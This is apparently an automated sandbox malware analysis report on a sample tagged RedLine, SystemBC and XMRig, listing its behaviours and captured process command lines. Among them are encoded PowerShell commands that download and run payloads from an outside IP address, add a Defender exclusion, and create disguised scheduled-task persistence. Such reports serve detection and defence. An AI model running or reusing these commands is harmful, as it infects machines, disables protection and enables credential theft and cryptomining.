Malware Analysis Report

2025-04-03 09:45

Sample ID 230504-m65ghsdf7v
Target file
SHA256 d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
Tags
systembc xmrig evasion miner persistence trojan redline [ pro ] infostealer spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

systembc xmrig evasion miner persistence trojan redline [ pro ] infostealer spyware

RedLine

SystemBC

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Identifies Wine through registry keys

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: LoadsDriver

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-04 11:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-04 11:05

Reported

2023-05-04 11:08

Platform

win7-20230220-en

Max time kernel

150s

Max time network

144s

Command Line

C:\Windows\Explorer.EXE

Signatures

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 564 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 set thread context of 640 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 324 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1056 wrote to memory of 1624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1056 wrote to memory of 1624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1712 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1056 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1056 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1056 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1056 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1712 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1712 wrote to memory of 1312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2016 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2016 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2016 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1056 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1972 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1972 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1972 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 768 wrote to memory of 1064 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1064 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1064 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 768 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 856 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 856 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 856 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 676 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 676 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 676 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 676 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 676 wrote to memory of 272 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 676 wrote to memory of 272 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 676 wrote to memory of 272 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 676 wrote to memory of 272 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {2C8EE0CA-7E9C-4078-9BA5-372B78652449} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

